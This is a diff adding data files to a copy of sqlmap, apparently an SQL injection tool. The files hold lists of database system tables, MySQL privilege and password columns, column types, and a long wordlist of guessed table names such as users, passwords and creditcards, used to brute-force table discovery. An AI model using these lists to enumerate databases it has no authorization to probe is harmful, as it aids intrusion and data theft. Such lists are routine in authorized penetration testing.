+FactFinance +FactInternetSales +FactInternetSalesReason +FactResellerSales +FactSalesQuota +ProspectiveBuyer +vAssocSeqLineItems +vAssocSeqOrders +vDMPrep +vTargetMail +vTimeSeries + +## Database: master +all_columns +all_objects +all_parameters +all_sql_modules +all_views +allocation_units +assemblies +assembly_files +assembly_modules +assembly_references +assembly_types +asymmetric_keys +backup_devices +certificates +CHECK_CONSTRAINTS +check_constraints +COLUMN_DOMAIN_USAGE +COLUMN_PRIVILEGES +column_type_usages +column_xml_schema_collection_usages +columns +COLUMNS +computed_columns +configurations +CONSTRAINT_COLUMN_USAGE +CONSTRAINT_TABLE_USAGE +conversation_endpoints +conversation_groups +credentials +crypt_properties +data_spaces +database_files +database_mirroring +database_mirroring_endpoints +database_mirroring_witnesses +database_permissions +database_principal_aliases +database_principals +database_recovery_status +database_role_members +databases +default_constraints +destination_data_spaces +dm_broker_activated_tasks +dm_broker_connections +dm_broker_forwarded_messages +dm_broker_queue_monitors +dm_clr_appdomains +dm_clr_loaded_assemblies +dm_clr_properties +dm_clr_tasks +dm_db_file_space_usage +dm_db_index_usage_stats +dm_db_mirroring_connections +dm_db_missing_index_details +dm_db_missing_index_group_stats +dm_db_missing_index_groups +dm_db_partition_stats +dm_db_session_space_usage +dm_db_task_space_usage +dm_exec_background_job_queue +dm_exec_background_job_queue_stats +dm_exec_cached_plans +dm_exec_connections +dm_exec_query_optimizer_info +dm_exec_query_stats +dm_exec_query_transformation_stats +dm_exec_requests +dm_exec_sessions +dm_fts_active_catalogs +dm_fts_index_population +dm_fts_memory_buffers +dm_fts_memory_pools +dm_fts_population_ranges +dm_io_backup_tapes +dm_io_cluster_shared_drives +dm_io_pending_io_requests +dm_os_buffer_descriptors +dm_os_child_instances +dm_os_cluster_nodes +dm_os_hosts +dm_os_latch_stats +dm_os_loaded_modules +dm_os_memory_allocations +dm_os_memory_cache_clock_hands +dm_os_memory_cache_counters +dm_os_memory_cache_entries +dm_os_memory_cache_hash_tables +dm_os_memory_clerks +dm_os_memory_objects +dm_os_memory_pools +dm_os_performance_counters +dm_os_ring_buffers +dm_os_schedulers +dm_os_stacks +dm_os_sublatches +dm_os_sys_info +dm_os_tasks +dm_os_threads +dm_os_virtual_address_dump +dm_os_wait_stats +dm_os_waiting_tasks +dm_os_worker_local_storage +dm_os_workers +dm_qn_subscriptions +dm_repl_articles +dm_repl_schemas +dm_repl_tranhash +dm_repl_traninfo +dm_tran_active_snapshot_database_transactions +dm_tran_active_transactions +dm_tran_current_snapshot +dm_tran_current_transaction +dm_tran_database_transactions +dm_tran_locks +dm_tran_session_transactions +dm_tran_top_version_generators +dm_tran_transactions_snapshot +dm_tran_version_store +DOMAIN_CONSTRAINTS +DOMAINS +endpoint_webmethods +endpoints +event_notification_event_types +event_notifications +events +extended_procedures +extended_properties +filegroups +foreign_key_columns +foreign_keys +fulltext_catalogs +fulltext_document_types +fulltext_index_catalog_usages +fulltext_index_columns +fulltext_indexes +fulltext_languages +http_endpoints +identity_columns +index_columns +indexes +internal_tables +KEY_COLUMN_USAGE +key_constraints +key_encryptions +linked_logins +login_token +master_files +master_key_passwords +message_type_xml_schema_collection_usages +messages +module_assembly_usages +MSreplication_options +numbered_procedure_parameters +numbered_procedures +objects +openkeys +parameter_type_usages +parameter_xml_schema_collection_usages +parameters +PARAMETERS +partition_functions +partition_parameters +partition_range_values +partition_schemes +partitions +plan_guides +procedures +REFERENTIAL_CONSTRAINTS +remote_logins +remote_service_bindings +routes +ROUTINE_COLUMNS +ROUTINES +schemas +SCHEMATA +securable_classes +server_assembly_modules +server_event_notifications +server_events +server_permissions +server_principals +server_role_members +server_sql_modules +server_trigger_events +server_triggers +servers +service_broker_endpoints +service_contract_message_usages +service_contract_usages +service_contracts +service_message_types +service_queue_usages +service_queues +services +soap_endpoints +spt_fallback_db +spt_fallback_dev +spt_fallback_usg +spt_monitor +spt_values +sql_dependencies +sql_logins +sql_modules +stats +stats_columns +symmetric_keys +synonyms +sysaltfiles +syscacheobjects +syscharsets +syscolumns +syscomments +sysconfigures +sysconstraints +syscurconfigs +syscursorcolumns +syscursorrefs +syscursors +syscursortables +sysdatabases +sysdepends +sysdevices +sysfilegroups +sysfiles +sysforeignkeys +sysfulltextcatalogs +sysindexes +sysindexkeys +syslanguages +syslockinfo +syslogins +sysmembers +sysmessages +sysobjects +sysoledbusers +sysopentapes +sysperfinfo +syspermissions +sysprocesses +sysprotects +sysreferences +sysremotelogins +syssegments +sysservers +system_columns +system_components_surface_area_configuration +system_internals_allocation_units +system_internals_partition_columns +system_internals_partitions +system_objects +system_parameters +system_sql_modules +system_views +systypes +sysusers +TABLE_CONSTRAINTS +TABLE_PRIVILEGES +TABLES +tables +tcp_endpoints +trace_categories +trace_columns +trace_event_bindings +trace_events +trace_subclass_values +traces +transmission_queue +trigger_events +triggers +type_assembly_usages +types +user_token +via_endpoints +VIEW_COLUMN_USAGE +VIEW_TABLE_USAGE +views +VIEWS +xml_indexes +xml_schema_attributes +xml_schema_collections +xml_schema_component_placements +xml_schema_components +xml_schema_elements +xml_schema_facets +xml_schema_model_groups +xml_schema_namespaces +xml_schema_types +xml_schema_wildcard_namespaces +xml_schema_wildcards + +## Database: msdb +backupfile +backupfilegroup +backupmediafamily +backupmediaset +backupset +log_shipping_monitor_alert +log_shipping_monitor_error_detail +log_shipping_monitor_history_detail +log_shipping_monitor_primary +log_shipping_monitor_secondary +log_shipping_primaries +log_shipping_primary_databases +log_shipping_primary_secondaries +log_shipping_secondaries +log_shipping_secondary +log_shipping_secondary_databases +logmarkhistory +MSdatatype_mappings +MSdbms +MSdbms_datatype +MSdbms_datatype_mapping +MSdbms_map +restorefile +restorefilegroup +restorehistory +sqlagent_info +suspect_pages +sysalerts +syscachedcredentials +syscategories +sysdatatypemappings +sysdbmaintplan_databases +sysdbmaintplan_history +sysdbmaintplan_jobs +sysdbmaintplans +sysdownloadlist +sysdtscategories +sysdtslog90 +sysdtspackagefolders90 +sysdtspackagelog +sysdtspackages +sysdtspackages90 +sysdtssteplog +sysdtstasklog +sysjobactivity +sysjobhistory +sysjobs +sysjobs_view +sysjobschedules +sysjobservers +sysjobsteps +sysjobstepslogs +sysmail_account +sysmail_allitems +sysmail_attachments +sysmail_attachments_transfer +sysmail_configuration +sysmail_event_log +sysmail_faileditems +sysmail_log +sysmail_mailattachments +sysmail_mailitems +sysmail_principalprofile +sysmail_profile +sysmail_profileaccount +sysmail_query_transfer +sysmail_send_retries +sysmail_sentitems +sysmail_server +sysmail_servertype +sysmail_unsentitems +sysmaintplan_log +sysmaintplan_logdetail +sysmaintplan_plans +sysmaintplan_subplans +sysnotifications +sysoperators +sysoriginatingservers +sysoriginatingservers_view +sysproxies +sysproxylogin +sysproxyloginsubsystem_view +sysproxysubsystem +sysschedules +sysschedules_localserver_view +syssessions +syssubsystems +systargetservergroupmembers +systargetservergroups +systargetservers +systargetservers_view +systaskids + +## Database: AdventureWorks +Address +AddressType +AWBuildVersion +BillOfMaterials +Contact +ContactCreditCard +ContactType +CountryRegion +CountryRegionCurrency +CreditCard +Culture +Currency +CurrencyRate +Customer +CustomerAddress +DatabaseLog +Department +Document +Employee +EmployeeAddress +EmployeeDepartmentHistory +EmployeePayHistory +ErrorLog +Illustration +Individual +JobCandidate +Location +Product +ProductCategory +ProductCostHistory +ProductDescription +ProductDocument +ProductInventory +ProductListPriceHistory +ProductModel +ProductModelIllustration +ProductModelProductDescriptionCulture +ProductPhoto +ProductProductPhoto +ProductReview +ProductSubcategory +ProductVendor +PurchaseOrderDetail +PurchaseOrderHeader +SalesOrderDetail +SalesOrderHeader +SalesOrderHeaderSalesReason +SalesPerson +SalesPersonQuotaHistory +SalesReason +SalesTaxRate +SalesTerritory +SalesTerritoryHistory +ScrapReason +Shift +ShipMethod +ShoppingCartItem +SpecialOffer +SpecialOfferProduct +StateProvince +Store +StoreContact +TransactionHistory +TransactionHistoryArchive +UnitMeasure +vAdditionalContactInfo +vEmployee +vEmployeeDepartment +vEmployeeDepartmentHistory +Vendor +VendorAddress +VendorContact +vIndividualCustomer +vIndividualDemographics +vJobCandidate +vJobCandidateEducation +vJobCandidateEmployment +vProductAndDescription +vProductModelCatalogDescription +vProductModelInstructions +vSalesPerson +vSalesPersonSalesByFiscalYears +vStateProvinceCountryRegion +vStoreWithDemographics +vVendor +WorkOrder +WorkOrderRouting + + +[Columns] + +# MySQL +## Table: mysql.user +Alter_priv +Alter_routine_priv +Create_priv +Create_routine_priv +Create_tmp_table_priv +Create_user_priv +Create_view_priv +Delete_priv +Drop_priv +Event_priv +Execute_priv +File_priv +Grant_priv +Host +Index_priv +Insert_priv +Lock_tables_priv +max_connections +max_questions +max_updates +max_user_connections +Password +Process_priv +References_priv +Reload_priv +Repl_client_priv +Repl_slave_priv +Select_priv +Show_db_priv +Show_view_priv +Shutdown_priv +ssl_cipher +ssl_type +Super_priv +Trigger_priv +Update_priv +User +x509_issuer +x509_subject + +# Oracle (types) +BINARY_INTEGER +BLOB +BOOLEAN +CHAR +CLOB +DATE +INTERVAL +LONG +MLSLABEL +NCHAR +NCLOB +NUMBER +NVARCHAR2 +RAW +ROWID +TIMESTAMP +VARCHAR +VARCHAR2 +XMLType + +# MySQL (types) +bigint +blob +char +date +datetime +decimal +double +enum +float +int +set +smallint +text +time +tinyint +varchar +year + +# Microsoft SQL Server (types) +bigint +binary +bit +char +cursor +date +datetime +datetime2 +datetimeoffset +decimal +float +image +int +money +nchar +ntext +numeric +nvarchar +real +smalldatetime +smallint +smallmoney +sql_variant +table +text +time +timestamp +tinyint +uniqueidentifier +varbinary +varchar +xml + +# PostgreSQL (types) +bigint +bigserial +boolean +bpchar +bytea +character +date +decimal +double precision +int4 +integer +interval +money +numeric +real +serial +smallint +text +time +timestamp diff --git a/src/sqlmap-master/data/txt/common-tables.txt b/src/sqlmap-master/data/txt/common-tables.txt new file mode 100644 index 0000000..8529ed3 --- /dev/null +++ b/src/sqlmap-master/data/txt/common-tables.txt @@ -0,0 +1,3763 @@ +# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +# See the file 'LICENSE' for copying permission + +users +customer +user +orders +employee +x_world +category +project +account +customers +country +config +groups +inventory +department +categories +messages +person +comments +sessions +student +items +employees +language +accounts +product +CUSTOMER +faculty +location +item +authors +parts +members +countries +status +menu +dependent +modules +role +products +page +chart +task +posts +DEPT +Person +user_role +ORDERS +emp +album +EMP +log +INVENTORY +payments +part +permission +contact +borrower +report +color +admin +SALGRADE +PRODUCT +vendor +tax +branch +projects +data +course +jobs +watchlist +shipment_line +CATEGORY +categoryNames +attributeCategory +db +PS_DMK +study +event +invoice +order_source +topics +students +order_line +regions +CPG_config +news +dept +permissions +events +shipment +sections +ITEM +hosts +form_definition_version +alias +people +role_permission +applications +CPG_usergroups +image +organization +courses +loan +form_definition +configuration +hibernate_unique_key +order +form_error +payment +Author +history +task_param +movies +dept_locations +track +services +EMPLOYEE +works_on +patient +Student +form_data +setting +PUBLISHER +partsgroup +languages +depositor +CPG_categories +book +Orders +job_history +metadata +exchangerate +shipto +rcpt +team +address +tasks +queue_info +subscribers +city +field_options +locations +statename +BOOK +zuseserver +ap +ar +Employees +USER +userInfo +telephone +session +User +video +LOCATION +tf_links +ACCOUNT +artist +property +the +request +acc_trans +lending +postaladdress +Customers +xmldocument +jiveID +domain +promotion +CPG_filetypes +assembly +business +orderitems +locale +gl +links +located +identities +sizes +companies +payload +Organization +protocol +transfers +encompasses +borders +profiles +salesorder +mailbox +contacts +tables_priv +admin_logs +text +phpbb_config +plugin +stores +host +Book +gifi +user_groups +term +internetaddress +tf_settings +region +poll +makemodel +partstax +catalog +question +vendors +departments +notes +delivery_quality +queries +identification +friends +vcd_Screenshots +PERSON +course_section +vcd_PornCategories +pma_history +jiveRemoteServerConf +channels +object +chip_layout +osc_products_options_values_to_products_options +login +user_newtalk +vcd_MetaDataTypes +entrants +Device +imageInfo +developers +div_experiment +items_template +defaults +osc_products +vcd_MetaData +mucRoomProp +QRTZ_JOB_DETAILS +settings +pma_bookmark +DEPENDENT +imageCategoryList +islandIn +mobile_menu_text +jiveUserProp +osc_products_options_values +wp_posts +package +mucRoom +vendortax +vcd_Comments +attrs +config_seq +company +register +checksum_results +ENROLLMENT +operation +primarytest +vcd_CoverTypes +binaries +COURSE_SECTION +Students +func +enrollment +pma_table_coords +readers +action_element +vcd_VcdToPornstars +osc_categories_description +friend_statuses +Domain +servers +UserFields +revision +meals +resources +mixins +sys_options_cats +licenses +pma_relation +SIGNON +clients +Apply +vcd_CoversAllowedOnMediatypes +ThumbnailKeyword +form_definition_text +vcd_Log +system +jiveOffline +tickers +BANNERDATA +mucAffiliation +fk_test_has_pk +rooms +objectcache +collection_item_count +div_stock_parent +jiveRoster +Volume +lookup +investigator +math +jivePrivate +vcd_UserWishList +osc_manufacturers_info +primarytest2 +PROFILE +categories_posts +Flight +Gallery +scripts +AUTHOR +physician +client +cv_country_synonyms +osc_categories +interwiki +logtest +archive +members_networks +vcd_MovieCategories +language_text +UserType +friend +div_annotation_type +osc_products_description +osc_products_to_categories +QRTZ_PAUSED_TRIGGER_GRPS +article +recentchanges +vcd_UserLoans +media +vcd_SourceSites +conducts +sales +CurrentUsers +Country +vcd_IMDB +vcd_Borrowers +querycache +Publication +Pilot +div_stock +Regions +DEPT_LOCATIONS +vcd_Users +master_table +vcd_VcdToUsers +funny_jokes +jos_vm_payment_method +vcd_UserProperties +osc_products_images +specialty +pma_pdf_pages +visits +div_allele_assay +vcd_MediaTypes +ipblocks +WidgetPrices +form_definition_version_text +experiment +Publisher +control +protocol_action +jivePrivacyList +vcd_VcdToPornStudios +subImageInfo +plugin_sid +message_statuses +state +GalleryThumb +hitcounter +vcd_Pornstars +QRTZ_BLOB_TRIGGERS +div_generation +jiveGroupProp +ingredients +community_item_count +jiveExtComponentConf +SEQUENCE +Continent +rights +div_statistic_type +Path +osc_manufacturers +logging +colnametests +QRTZ_FIRED_TRIGGERS +div_locality +sailors +Description +warehouse +DEPARTMENT +legacy_things +jiveVCard +agent +CPG_bridge +CUSTOMERS +jiveProperty +app_user +keyboards +div_unit_of_measure +categorylinks +grants +Action +div_trait +div_trait_uom +WidgetReferences +product_type +developers_projects +userAttribute +vcd_Sessions +form_data_archive +vcd_PornStudios +action_attribute +Thumbnail +jiveGroupUser +computers +QRTZ_LOCKS +vcd_PropertiesToUser +customertax +sector +networks +columns_priv +globals +div_obs_unit_sample +Widgets +TERM +salgrade +div_passport +vcd_UserRoles +mucMember +imagelinks +exchange +Status +WORKS_ON +lines +testusers +booleantests +QRTZ_SIMPLE_TRIGGERS +mobile_menu +staff +vcd_VcdToPornCategories +tblusers +hashes +partner +Product +personnel +ads +vcd_Covers +osc_specials +Keyword +supplier +agent_specialty +pokes +profile_pictures +oldimage +div_poly_type +osc_products_attributes_download +div_allele +isMember +vcd_Images +userImageRating +detail_table +osc_products_attributes +pma_table_info +officer +div_obs_unit +vcd_Settings +COURSE +Time +locatedOn +medicalprocedure +fk_test_has_fk +mergesWith +author +UserFieldsInfo +Employee +oe +QRTZ_TRIGGERS +insurance +SUPPLIER +div_aa_annotation +song +imageAttribute +views_track +extremes +vcd_VcdToSources +jiveRosterGroups +webcal_config +phpbb_ranks +triggers_template +appVersions +vcd_RssFeeds +DUMMY +ROLE +activity +study_text +osc_products_options +City +QRTZ_SCHEDULER_STATE +osc_reviews +edge +questions +partof +blobs +QRTZ_CRON_TRIGGERS +tag +userSession +vcd +pma_column_info +auto_id_tests +job +site_stats +mucConversationLog +sequence +madewith +OperationStatus +SPJ +turizmi_ge +zutat_cocktail +DWE_Internal_WF_Attributes +zipcodes +insertids +ChemList +product_category +foreigntest2 +hero +cmContentVersionDigitalAsset +reports +devel_logsql +f_sequence +MEMBER +ClassificationScheme +ez_webstats_conf +credential +utilise +cmDigitalAsset +ACL_table +service_request_log +feedback +vars +tblblogentriescategories +assignment +CUST_HIST +ew_menu +time_zone_transition_type +child_configs +LIBRARY_BRANCH +Company +Component +webcal_entry_log +transactions +webcal_entry_ext_user +dept_location +ConsultantsTable +phonelist +sys_acl_actions +participate +population +dtb_order +files_config +PropColumnMap +result +pma_designer_coords +triggers +audittrail +f_attributedependencies +organization_type_package_map +DWE_Corr_Sets +userlist +backgroundJob_table +sf_guard_user_permission +my_lake +DWE_Corr_Tokens +sampleData +qrtz_blob_triggers +reciprocal_partnersites +rss_categories +ADMIN +site_map_ge +Factory_Output +geo_Estuary +phpbb_themes +forum +ClientsTable +mushroom_trainset +rating_track +iplinks +maxcodevento +reciprocal_admin +ew_moduli +CheckType +cmLanguage +phpbb_points_config +guava_sysmodules +querycachetwo +soc_da_polit_ge +BOOK_AUTHORS +records +reciprocal_config +newsletter_queue +passwds +phpbb_posts_text +biosample +connectorassocs +BOOK_COPIES +jos_sections +vote +SCRIPT +THOT_CATEGORY +artifact +object_types +pages +usuario +CE_table +phpbb_forums +tbl_country +Products +dtb_bat_order_daily +site_wtype +geo_mountain +expression +Simple_Response +photoo +photos +child_config_traffic_selector +version_data +allocation +dtb_category_total_count +habilidad +PREFIX_group_lang +work_orders +SELLER +cv_soil +taxon +bkp_ItemResource +ezcontentobject_trash +webcal_view +pagecontent +Collection +maxcodcurso +self_government_ge +phpbb_user_group +InstanceStringTable +bldg_types +t1 +mailaddresses +section +m_type +configlist +cmRepositoryContentTypeDefinition +trade +Parameter +jforum_privmsgs +tbl_works_categories +help_category +bkp_String +Class_Display_Sequence +EPIXEIRISI +sounds +phpbb_groups +dtb_campaign +produit +adblocks +vendor_seq +guava_theme_modules +dtb_pagelayout +bookings +cmPublicationDetail +writes +writer +distance +DWE_Resource_Attributes +jforum_groups +Polynomial +river +GROUP +sea +IDIOTIS +cmPublication +last +UsageParameter +phpbb_topics +t_peep +PREFIX_group +dtb_delivfee +equipment_type_seq +wp_users +news_category +SchemaInfo +WidgetDescriptions +dtb_category_count +sidebar +R1Weights +humanitaruli_ge +cmTransactionHistory +facets +jforum_roles +samedicino_ge +qrtz_job_listeners +geo_Lake +religion +nuke_gallery_media_class +cia +DatabaseInfo +R2TF +THOT_THEME +R1Length +cmContentRelation +S2ODTMAP +enrolled +liste_domaines +DEMO_PROJECTS +ORDERSTATUS +site_iwis +MountainOnIsland +bkp_ItemReference +Category +Mountain +INSTITUTE +POINT +forum_vote +THOT_TYPE +cmts_track +bkp_ItemReplication +hostbenchmarks +filearchive +f_spatialcontext +UM_ROLE_ATTRIBUTES +SCALE +maclinks +books +DWE_Predecessors +interactions +graphs_items +stars +BID +enrolls +site_environment +user_types +Severity +partscustomer +wp_pod_types +River +marital_status +PZ +PN +email +CustomerCards +mtb_zip +Campus +R1Size +hardware +dtb_other_deliv +pricegroup +commissionEmployees +cv_pests_diseases +tbl_tech +macswitches +cc_config +audit +colour +command +audio +egresado +aggtest +transport +zusti_da_sabuneb_ge +div_scoring_tech_type +R2Weights +schedule +routers +zips +DWE_Delay_Timers +Descriptions +software +wh_der_children +delivery +placex +cv_crops +problem +Station_Data +account_transaction +time_zone_name +numedia +THOT_DEEP +ZENTRACK_VARFIELD_IDX +roads_endpoints +Propdesc_table +general_log +peer_configs +hot_prop +phones +ServiceBinding +emailinfo +dtb_member +cmSiteNode +nodes +sbreciprocal_cats +rss_read +DWE_Workflow_Documents +bombing +tblblogtrackbacks +fragment +dtb_review +tblblogsearchstats +datasources +CPG_users +vrls_partners +guava_roles +webcal_user_layers +ANSWER_GROUP_DETAIL +tbl_clients +dtb_kiyaku +EmailAddress +Sea +powers +QRTZ_CALENDARS +reserve +LINEITEM +project_user_xref +Agent +idioma +dtb_campaign_detail +jos_components +user_rights +tf_messages +Class_Def_Table +geo_lake +copytest +tissue +ligneDeFacture +PZ_Data +tf_cookies +archtypes +cmts +photo +dtb_bloc +user_preferences +music_ge +D_Abbreviation +data_set_association +site_location +jforum_posts +Property +pg_ts_dict +badspy +gearing +credenziali +abstract +evidence +files +test +intUsers +div_treatment +tblblogentries +cocktail_person +cdv_curated_allele +REORDER +Religion +turns +MetadataValue +curso +redirect +accountuser +qrtz_cron_triggers +StateType +forum_user_stat +Descriptions_Languages +m_users_profile +Booked_On +not_null_with_default_test +tblblogroles +organizations +topic +economy +DWE_Org_Resources +Model +maxcodcorreo +RATING +Transactions +Chemicals +m_data +USER_GROUP +equipment_type +geo_Island +sysmaps +ezin_roles +phpbb_themes_name +dtb_send_history +dtb_send_customer +cart +size +pg_ts_cfgmap +LimitTest2 +QUESTION +DC_Data +webcal_group_user +telefono +builds +tbluserroles +webcal_site_extras +solde +document +m_users_acct +vendor_types +fruit +DWE_Resources +Service +PART +cell_line +dtb_bat_order_daily_age +images +apartments +THOT_ALPHA +ippaths +area +SYNALLAGI +sysmaps_hosts +tbl_works +statuses +webcal_user +customurl +THOT_YEAR +DWE_Subscriptions +correo +kultura_ge +Factory_Master +inv_lines_seq +certificates +webcal_asst +ostypes +POINT_SET +R2IDF +forum_flag +bugs +taxonomy +UM_ROLES +div_synonym +payer +tf_log +job_title +ask +wp_options +forum_user_activity +trackbacks +wp_pod_fields +cmAvailableServiceBindingSiteNodeTypeDefinition +translation +cdv_passport_group +User_ +Users +access_control +my_county +zoph_people +account_permissions +ORDERLINES +ganatlebe_ge +wp_term_relationships +pictures +product_font +Departure +mushroom_test_results +routerbenchmarks +bkp_Item +Channel_Data +realtable +mushroom_NBC_class +odetails +user_type_link +eco_da_biz_ge +belong +ezin_users +time_zone_transition +ew_tabelle +ezsearch_return_count_new +cmSystemUserRole +m_users +div_accession_collecting +Economy +tbl_works_clients +qrtz_locks +geo_Mountain +dtb_category +tmp +reservation +geo_Desert +dtb_payment +forum_topic +ezsearch_search_phrase_new +jforum_attach +sazog_urtiertoba_ge +Equipment +iuridiuli_ge +MetadataSchemaRegistry +basePlusCommissionEmployees +addresses +phpbb_search_wordlist +user_defined_attribute +fournisseurType +dpt_trans +PostalAddress +defaultinsertid +Politics +pools +cocktail_lokal +dtb_blocposition +templatelinks +jforum_ranks +D_Format_Data +tblblogtextblocks +time_zone_leap_second +rss +Decimation +dtb_user_regist +f_options +siteIndexTable +Administrator +phpbb_users +ezin_authors +SpecificationLink +videos +sf_guard_remember_key +employer +monitoringi_ge +leases +phpbb_smilies +stats +f_spatialcontextgroup +experiencia +dtb_csv +line_items_seq +ndb_binlog_index +zoph_categories +help_topic +div_treatment_uom +transaction +wp_links +DWE_Organizations +live_ge +cdv_allele_curated_allele +timeperiod +item_master_seq +GLI_profiles +cv_countries +qrtz_scheduler_state +journal +tf_users +mwuser +stories +dtb_table_comment +jforum_quota_limit +Lake +SQLDATES +phpbb_search_wordmatch +friend2 +functions +comboboxes +DWE_Max_Id +std_item +foreigntest +jiveVersion +sf_guard_group +Classification +Sensitivity +PREFIX_category_group +preferences +credit +geo_sea +type +knjiga +FindCriteria +zoph_prefs +webcal_entry_repeats +room +domain_info +SALES +DWE_Tasks +profession1 +SUPPORT_INCIDENTS +PERMISSION +Defect +DWE_Task_Attributes +grandchild_test +Desert +KARTA +UM_ROLE_PERMISSIONS +Purchases +PREFIX_configuration +guava_themes +alltypes +webcal_view_user +vrls_xref_country +R1TF +subject +continent +D_Format +dtb_recommend_products +Linkdesc_table +qrtz_fired_triggers +TelephoneNumber +dtb_customer_mail_temp +copyrights +jforum_extension_groups +DEMO_ASSIGNMENTS +guava_group_assignments +jforum_extensions +zutat +ew_user +duptest +alerts +partsvendor +jiveGroup +organization_seq +dtb_customer_reading +configuratore +tbl_event +my_street +osvendors +softwares +Session +admins +TIL_IDIOTON +EthnicGroup +reviews +tblblogentriesrelated +guava_packages +GRouteDetail +cdv_reason +nulltest +membership +bkp_RS_Servers +vrls_listing_images +schema_info +entity +group +ClassificationNode +dtb_best_products +cv_cropping_system +DWE_Workflows +egresadoxidiomaxhabilidad +locus_data +dtb_order_temp +tblblogsubscribers +account_log +facture +MetadataFieldRegistry +BRANCH +orgs +DM +NextID_table +webcal_group +DC +wp_pod_widgets +chromosomes +Name +roster +dtb_csv_sql +synchro_type +langlinks +genres_in_movies +qrtz_triggers +Province +answerOption +wp_postmeta +ERDESIGNER_VERSION_ID +calendar +cmEvent +ruletest +forum_user +SalesReps +ew_gruppi +vrls_xref_state_province +conferences +pay +Plane +webcal_entry_repeats_not +Island +tbl_works_tech +webcal_import +nuke_gallery_comments +monthlabel +tblblogcomments +dtb_delivtime +product_size_multi +manufacturer +Tasks +island +coupon +webcal_report +RegistryPackage +sysmaps_links +procs_priv +invoices_seq +film +genres +field +vertex +FoundThumbs +qrtz_trigger_listeners +reciprocal_links +DWE_Meta_Data +Course +idiomaxegresado +ordreReparation +Assigned_To +ORDERITEMS +PREFIX_product_attribute_image +COLLECT_SITE +THOT_CONCEPT +publisher +dtb_mailmaga_template +DSObject_table +forum_post +sf_guard_permission +Prefixes +dtb_update +BROWSE +tf_rss +TIME +reciprocal_mails +association +typeFacture +StringTable +CATEGORIES +Language +mountain +ad_locales +ExtrinsicObject +R2Size +geo_island +derived_types +snipe_gallery_cat +qrtz_job_details +guava_roleviews +production_wtype +AccountXML1 +wh_man_children +not_null_test +product_colour_multi +ike_configs +intUseringroup +study_user +pg_ts_cfg +connectorswitches +procedure_biosample +theday +fournisseur +typeProduit +BOOKAUTHOR +passwords +keys +AuditableEvent +ExternalIdentifier +source +BOOK_LOANS +UserRole +vrls_xref_listing_offer_type +cmRole +PREFIX_search_engine +my_poi +Channel_Comment +forum_cat +invite +PREFIX_order_return_state +experimental_data_set +DOCUMENT_FIELDS +Scripts +mushroom_dataset +desert +Can_Fly +synchro_element +maxcodtelefono +enrollments +tblblogpages +f_attributedefinition +intGroups +way_nodes +child_test +THOT_TARGET +MOMENT +dtb_classcategory +product_price +relation_members +PREFIX_access +dtb_deliv +webcal_categories +Parts +invoices +QRTZ_JOB_LISTENERS +ANSWER +tbl_categories +yearend +DEPARTMENTS +account_level +ref +help_relation +zoph_users +procedure_data_set +Association +mtb_pref +ANSWER_GROUP +GDirectedRoute +graphs +occasion +account_temp +nuke_gallery_categories +areas +cmContentVersion +checksum_history +mushroom_test_results_agg +accessTable +cameFromTable +services_links +Coefficients +reglement +maxcodexperiencia +vrls_xref_listing_type +adv +lake +tests +Offices +qrtz_simple_triggers +Editor +sazog_urtiertoba_ge2 +wp_pod_pages +Extlangs +seq_gen +rss_subscription +Station_Comment +R1IDF +jforum_config +cmServiceDefinitionAvailableServiceBinding +geo_River +facilities +connectorlinks +file_storage +neuf +school +wp_term_taxonomy +m_plans +ligneDeCommande +FORM_QUESTION +history_str +f_classtype +endpoints +R2Length +zoph_albums +bkp_ItemPresentation +tblblogcategories +div_taxonomy +traffic_selectors +FORM +qrtz_paused_trigger_grps +creditcards +people_reg +country_partner +jforum_users +array_test +dtb_mail_history +priorities +relations +combustiblebois +slow_log +DWE_Resource_Roles +WROTE +flow +pay_melodies +dtb_templates +variable_interest +dtb_class +ZENTRACK_VARFIELD +catalogue +uplebata_dacva_ge +wp_usermeta +time_zone +games +wp_terms +sf_guard_user_group +honorsinfo +maxcodestudio +estudio_academico +RECORD +Room +alarms +ew_temi +clubs +net_pm +tbl_state +cmContentTypeDefinition +radacct +peer_config_child_config +cmAvailableServiceBinding +cmSiteNodeVersion +Poles_Zeros +ipmacassocs +m_news +dtb_news +shared_secrets +UsageDescription +rol +phpbb_posts +ipassocs +cmSystemUser +phpbb_categories +FoundLists +jforum_smilies +channelitems +lokal +subcategory +Languages +jiveSASLAuthorized +DWE_WF_Attributes +cocktail +cust_order +mushroom_testset +THOT_SOURCE +product_font_multi +presence +UM_USERS +jiveUser +cmSiteNodeTypeDefinition +wp_comments +dtb_bat_order_daily_hour +jos_vm_category +CONTACT +SpecialityTable +librarian +geo_river +MonitorStatus +pagelinks +ways +DWE_Roles +jforum_vote_desc +cities +PREFIX_order_return_state_lang +subscriber +prereq +Slot +rss_item +UM_USER_ROLES +PREFIX_timezone +evento +guava_views +cmServiceDefinition +Variants +searchindex +actions +cdv_passport_set +production_multiple +page_log_exclusion +furniture +nuke_gallery_pictures +cmRepositoryLanguage +oc +os +PREFIX_tab_lang +lc_fields +framework_email +datasets +sporti_ge +externallinks +geo_desert +politics +hourlyEmployees +D_Comment +EMPLOYEES +individual +m_with +program +combustible +ezin_articles +pma_tracking +help_keyword +POSITION +stars_in_movies +glas +cmRepository +dtb_mailtemplate +DIM_TYPE +cart_table +D_Unit +array_probe +macassocs +changeTva +UM_PERMISSIONS +geo_Source +R1Sum +cdv_marker +nuke_gallery_template_types +UM_USER_ATTRIBUTES +Aircraft +store +Descriptions_Variants +trigger_depends +guava_role_assignments +ExternalLink +bkp_RS_Clusters +PN_Data +users_sessions +webcal_nonuser_cals +parent_test +cmServiceBinding +BUYER +transcache +dtb_question_result +rss_category +profiling +QRTZ_TRIGGER_LISTENERS +THOT_LANGUAGE +cmContent +Descriptions_Scripts +DSProp_table +webcal_report_template +service_request +resource_types +THOT_SUB_MENU +bkp_ResourceFolder +PREFIX_tab +province +dtb_bat_relate_products +changePrix +proc +ewst_sessioni +nuke_gallery_media_types +outdoor_spaces +po_seq +salariedEmployees +grp +jforum_topics +defertest +array_data +most_recent_checksum +m_earnings +product_related +dtb_baseinfo +webcal_import_data +federationApplicants +qrtz_calendars +melodies +jforum_forums +sf_guard_group_permission +sys_acl_matrix +R2ODTMAP +mushroom_NBC +country_diseases +dtb_order_detail +sic +PROJECT +log_fake_referers +ROLE_PERM +isDeleted_table +vrls_listings +Table +sf_guard_user +Subject +cdv_curation +dictionary +forum_report +institution +cmQualifyer +jforum_categories +site_climatic +phpbb_points_values +zoph_color_schemes +DWE_Internal_Task_Attributes +uniquetest +TypeRule +dtb_customer +R2Sum +PREFIX_customer_group +ProjectsTable 